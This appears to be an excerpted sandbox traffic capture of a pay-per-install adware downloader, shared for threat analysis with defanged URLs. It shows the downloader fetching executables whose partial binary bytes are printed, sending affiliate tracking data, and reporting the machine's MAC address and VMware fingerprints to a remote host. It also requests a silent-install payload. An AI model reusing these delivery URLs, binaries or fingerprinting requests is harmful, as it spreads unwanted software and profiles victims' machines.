<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>.</body></html>...
<<< skipped >>>
GET /report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-Length: 0..
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3782
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "f62071084680ed861fa12c3ea47cb6e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pX-9uxJlT7jHPHPa1yz36Uw4GIzmVJmi_A2mcbd77axMEEGJVaJgoQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<...hIDATx..[kl#W....yO......?..u..H..P..J...$@..K...l. .}..}P@@..J........q..H@3.E.u@.".Zg7.$..$q..f..\...c;....(W;.].x.~......;....?......c.|X........B...;D...rv&.M..eE...eZ..1Ts5....E?..{O.x....B.. ..=B...D...~.,,..p.493...XB.R...2&......1...., .5.....b[.B`ae...oF...p.FZ.,."..zh......p...yH.l>!4:. .[aXi.3.... |.. ..t.....J...../4...(T.meL..'9ceC.]R//...FkW.Z...vpb6d..?......=.x..M.RO....P..p[c-..K.p.,v........K.|.=......:!..2............<`....j....Mq...C<{*L2j.^05g.q=}qy`..sy ]3.UK.j.....o.Z.......2&u5{.fw.}6.Oe8cuCO._..<.Jd.9.;.......[4.2.i....y.K.Z.......q..J.A^..g......1..|.lN.)8............f.q]...4............I..c...=.2..[..2LZ.1rIf....3.....M...2.M.f..R siU..i..0.....9_.?.'...S.R#.sN.{.s.........@7...%..{........w>....A.V...{?..V9.*G.....,.......lA.:7.........E.q.C..._W.Dd.k;&D..4..E}3.}..X.c.)`.!.$...R.........X.<....^.PH..NO.)...^KM-.......:.8...Q..S7.`. ...V...D.@.'.<..x!..1.PU.ktr<R.@.W.......t....l..'d..n.'|v*...R..=.uau0..uC...S.......G....F............f...h.XN.h..-(..../....l.f..fI..`G.|.....\...bf..Q*...p....Y..R......w........\aj.TR..IUA.d.6...@.DqNi..8.#.l!)l(,V....6m.<...E..../.y....P.......y.........O.f....-.....Y....B.(.s..r....z<jf....m...[Hc...%5.....$..x.Z...u2.....h.........94{.....9...\.wE.?....!E.\l..S...).....A...2FV.y..Z..d.HEPsy....!.*X.......?s|.qM..y..U.s.......m....Zi.T......C....m.nB.......4.....Q.........) ...Ph..'.~|..nZ'.Fpk..:....3...)_|.~....H..gnM.J?k....$y......-.....
<<< skipped >>>
POST hXXp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:22 GMT
Connection: close
Content-Length: 37480
....~h........7.zEh....< ..v.H....x.3..zPrd9F..........8. ..oH.X....{<...v"..VC...j.R.'L.3. ....;6.|.d,.z..$........1..1f%..Be ..M..7...K.)... ..B.(...:.....Z.........P2...*.z)NZei......H[ 3.......3...m.I._AF.......6...@.$..[.v.....>....Y.o..<....i.|...T...!.#..M..............SD.(....i..<R....|6.H.v[.B2....5j...$.pyj..^...9...D..~.. ....6...8..._.#{..;z...6..u..d.K.....s..,zW...c...[.d..4.#.O.S..zoD...4...-[A..s...A...Y..l....*zd...y...V.3;~-...%....t.ft.......e.MK..xMs...W?K.9.BA.Hs..q..d7..(.;o...O....F.... ..m.(......S..lZ..R...... ..[..4.t...u..u...<;*#.)_S.d.V,s. jX.).@.oM....k..}./^-l.e..uE.......l..,.W#......vK.i..yGY..H`..z.M5}..2(...-F&o./.$.4T.I?.!...7Ez.G.>.....&....~.C3...(a#..`..AHs....H.v)So....~.).../).:#.<.{.).V....f....V.F.X..?.......(....f.E..E..r...X......Y......5. ..3.-.H.....<.Z..Yo.y..v...[.......t.......Dl.3.......LJ3Wj...:...).]k.W"6..W.5AB....t....bd`|....e^.K......N..\.-m...0T...?.....I.%...x4..{...........^[.X..^...@o...CN....0.@...)0.#..4)...GA..KX1....u?.....)Vg..pz..G...O.,K"c".0.(@ ..@..2......U......m.to...r.1.4. a..G.v.._0.a......c~..........R!v.CVH..-&..q.........n ..z..C.@d...... ;w.D..S.8.F. .VT..}1.,.>.X...U...U.Z..f...W(}-$..K%..&...K.8...IA..,y2....1I#a\e.F...uX...[{k...9\...D.Q^K.6.$fR..._.6C.uR'..}.;...$-.s....,.Pu\N..'.*..s.{r..e..H..1@.T...J.X)z..d..PR...O...f.. k...t.S....1. .]../%/_.D6...x... .J..c..>...X.N....a..."P...=B...y.'......<....Y$l.kj.......<>.[..oq....(Z..4Z.Fw.U.....>..A.ps.De.=..9MF...[;$G..H.....~...j.]..b..1
<<< skipped >>>
GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Installation HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60652
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5827498a25abb_ua.exe"
X-Powered-By: ASP.NET
Date: Sat, 12 Nov 2016 16:55:38 GMT
Age: 44593
X-Cache: Hit from cloudfront
Via: 1.1 cd57e6888980d1e458b233b5ef20ee46.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i8UIml3LnG1MKA8CDNO6PQ3HlSVYkDtsv9mUevVxV14GyEXXXEltOw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................`............@.................................4........@..........................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....P......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
GET /taveara?q=setup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 300fc49e36a12914-OTP
0..HTTP/1.1 301 Moved Permanently..Date: Sun, 13 Nov 2016 05:19:19 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Control: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: post-check=0, pre-check=0..Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr..Access-Control-Allow-Credentials: true..Access-Control-Allow-Headers: *..Access-Control-Request-Headers: *..Server: cloudflare-nginx..CF-RAY: 300fc49e36a12914-OTP..0..
<<< skipped >>>
GET hXXp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:20 GMT
Connection: close
Content-Length: 593
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>..
GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-Length: 0..
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 13 Nov 2016 05:19:26 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716800
Connection: Close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R.......R...S...R..4....R..4....R..4....R.Rich..R.........................PE..L...=0.X.................b........................@..........................P............@.............................................8E......................\Z.. ...................................@...............\............................text...[`.......b.................. ..`.rdata..d............f..............@..@.data....[...@...4..................@....rsrc...8E.......F...L..............@..@.reloc..@].......^..................@..B......................................................................................................................................................................................................................................................................................................... ..........3.9.....V........D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......]..}...E.s..E.SSS.6Ph..G......YY...6....F.Sj..M............3..H..H....3....H..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..6TF.......}.j.....G.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G\........G............................................................................................_x._|................V........D$..t.V..=..Y..^...j...TF......j....H.X3.3..}.....H...G....H.....H.f....H.
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2024
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:42 GMT
Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT
ETag: "d9eb4e61c136f58576485da85fc9897d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64430
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RNnNcZpMOUg5CGj4HVkrzEXlQWhIkZKaZJi-h-cKXyELoonJcVIG7Q==
..<html><head>.. <meta charset="utf-8">.. <meta name="description" content="">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Thank You Page</title>.. <link rel="stylesheet" href="assets/css/style.css">.. <body>.. <header class="header">.. .<div class="header-top green"></div>.. .<div class="header-bottom grey">.. ..<h1 class="typ">.............. .... ....................</h1>.. .</div>.. </header>.. <div id="widget">.. <div class="adnl_zone">.. <script type="text/javascript">.. /*<![CDATA[*/.. supp_key = "575f4f5e34f49079faeab77365968081";.. supp_time = new Date().getTime();.. supp_channel = "";.. supp_code_format = "ads-sync.js";.. supp_click = "";.. supp_custom_params = {};.. /*]]>*/.. </script>.. <script type='text/javascript' src='//VVV.1-1ads.com/js/show_ads_supp.js?pubId=907'></script>.. </div>.. </div>.. <footer class="footer green">.. .<div class="container">.. ..<h3 class="green">.......... .................., .......... .................. ....................:</h3>.. ..<ul class="steps
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TkxLSAtQrofDzYiZGGzEPDHmdWKYGV5NKLAXdAGX1Nu99LN1UPCSVg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;...text-align: center;...color: #333;..}...container{...margin: 0 auto;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...header h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...padding-top: 13px;..}...header h1 span{...display: block;...font-size: 14px;..}...header-top, .header-bottom{...position: relative;...height: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{...background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position: relative;...width: 100%;...height: 216px;...background: #e5e5e5;...border-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box-sizing: border-box;...box-sizing: border-box;..}...footer:before{...position: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;...width: 100%;...content: '';.....}...footer.green:before{...background: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...footer h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.green{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.steps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 13 Nov 2016 05:18:13 GMT
Server: AmazonS3
Age: 82
X-Cache: Error from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-Type: application/xml..Transfer-Encoding: chunked..Connection: keep-alive..Date: Sun, 13 Nov 2016 05:18:13 GMT..Server: AmazonS3..Age: 82..X-Cache: Error from cloudfront..Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)..X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==..f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..
GET /js/show_ads_supp.js?pubId=907 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Transfer-Encoding: chunked
Date: Sun, 13 Nov 2016 05:19:34 GMT
Connection: close
2000..var supp_ads_host_overridden="//VVV.1-1ads.com";.var supp_key,supp_channel,supp_code_format,supp_ads_host,supp_ads_host_overridden,supp_click,supp_custom_params,supp_width,supp_height,supp_target_id,supp_template_target_id,SuppConfig,SuppAdsConfig=SuppConfig,CustomWLAdServer=CustomWLAdServer||{requests:[]};.CustomWLAdServer.sendbackPlacementKeyFromRequests=function(a){var c=CustomWLAdServer;if(c.requests&&0<c.requests.length&&c.passbackCallbacks&&c.passbackCallbacks["v2-" a])for(var b in c.passbackCallbacks["v2-" a]){var d=c.findRepReqByKey(b);(d=d&&(d.supp_target_id||d.elemId))&&document.getElementById(d)&&c.doPostMessageFuncIntoIFrames(document.getElementById(d),"customwl.plkey.for.banner" a "\x3d" b)}};.try{var messageEventListener=function(a){if(a&&a.data&&"string"===typeof a.data){if(0==a.data.indexOf("rrImpl")){try{eval("CustomWLAdServer." a.data)}catch(c){console.warn(c)}return!0}if(0==a.data.indexOf("sendRequestInfo:")){var b=a.data.substring(16),b=CustomWLAdServer.findRepReqByKey(b);if(null!=b)return b.elemId&&document.getElementById(b.elemId)&&document.getElementById(b.elemId).contentWindow&&document.getElementById(b.elemId).contentWindow.postMessage("requestInfoMessage:" JSON.stringify(b),."*"),!0}if(0===a.data.indexOf("customwl.plkey.request.for.banner\x3d")){var b=a.data.split("\x3d")[1],d=CustomWLAdServer,e=d.passbackCallbacks&&d.passbackCallbacks["v2-" b];if(e)if(1==Object.keys(e).length)e[Object.keys(e)[0]]();else d.sendbackPlacementKeyFromRequests(b)}if(0==a.data.indexOf("requestInfoMe
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 1519
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "659184a48243f6ae257bc88d601ac7e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hwFaWw-7Nj8eeAHF2MXvCTn7uuTK6GtEQuMIKFI2ctTLJUFa2FHwEQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.O[u.........(.E....o..............U0...Q`.%...}0..$..d....%&=<.H.|q.sNZ..R..=7.._/P...Z.....rN.....;..0`.......0`.....S<q..x.6...8. .....4=A].....Y...L<y~&\".I.G..X.Y,......L\{......./..s.Id.1L....si6o@.c.4.h...5:8.....!...............j..W.h..UvZ...bC.B....1..j\YZ..9...9....r0..8......V...\..[.HO.y..`.{w..SQ.[.m..L.V.nli.....L..`..n&...\.bZ.U.@.q...u.......wJ.~.f......:.......x.i.g.......s...>4...J...z .^r.z..3....RO<y.wI.).Z..v......^p.u.y"H....W*6Q..tX."?..w...'...%. .......f.|o....3.s......:.Zz].2.............|.v..U....c..z.b....i........>....q.S .....'k3...6.......>D.qY.E............................1e1=.Ff)..o..|_..O...z...P6. ... ....?O.S...=.DtU..c.-C....SG.%.Y....*.......#.=y.K.quyM.......g.(....\9y.Y..s\v....!.......>@..d............I..d{.m...!..zFR..........._#rr9.g....ut~....!..;....-....*w...Hx.E.C]........}.....c.n"..>.".._.ZQ.C.."....q.j"...... ......._I....S.g.....f...o3..Q...jpf......s.)...1B].SO..3..$N..].g(.z......D.......T...C/......u.a}....`. ":m.-m..W.....4..JJ.}...%.U.T....-.N.....m."..?YE...q=....|P.....X.H,.......|..J.F.#M.......w.t...Xrr&..e=;.a......R.e.RN...2....n-....g..8d../;....b......p..).&.0Xm.._.Gs.T..V.y.mo..3....h...F.-.^HH......k....2i...v..&.......j..s,...~ok......=......n.`.x..1.-.I...G..V...F...,U.K...Hb".;p...A/...s.V/.._....7q.S.|....&.~81v-..../...!.G.Q.m............\./*.$h...>..*.u.@b.ZM~h1yH..W.E...Wp].a.'{....8r.A,...r.....).hY...?.KE.u.........._...d
<<< skipped >>>
GET /get.php?ses=429155916441231936 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 636416
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 13 Nov 2016 05:18:17 GMT
X-Cache: Miss from cloudfront
Via: 1.1 420810dc8ca5cb74b64cae9e4b264cc9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WzMfcmhZ-U-zig-ivUSgMwISw4lkFuvogIDTJNXx0sRnwuKboE_IfQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.Q.U...U...U..r....U..r....U..r....U.......U.......U.......U.... ..U...U...U..S....U..T....U...U|..U..S....U..Rich.U..........................PE..L...h.'X.................\...t...............p....@.......................... ............@.....................................P........5......................| ......p...........................@...@............p..p............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data....Y...0...<..................@....gfids...............P..............@..@.tls.................R..............@....rsrc....5.......6...T..............@..@.reloc..| .......,..................@..B.................................................................................................................................................................................................................................4.I..6;..h.iD...H.I.......D.I.......4.I.......Y.................L.I...:..j.h .D...`.I.......\.I.......L.I....:..h.iD..k...Y....j..g...h.iD...8.D..d.I..J........d.I..h.I....jI..a...h.jD..'...Y.....................X........F..F......O..O..o....^R].c.h..E...!..:..|..L..9.....P.u..E....8.........?b.0.....E..D.(.}!W.0...YY....D...|...v........D.....v............u..E..............'......|..D..8.....P...U......E..M..E..E..E.P.|..L.P.D.....]...U..Q_.u....u..dv.........B..q7;<..L.s&......?...k.0.....E..D.!.t.
<<< skipped >>>
GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
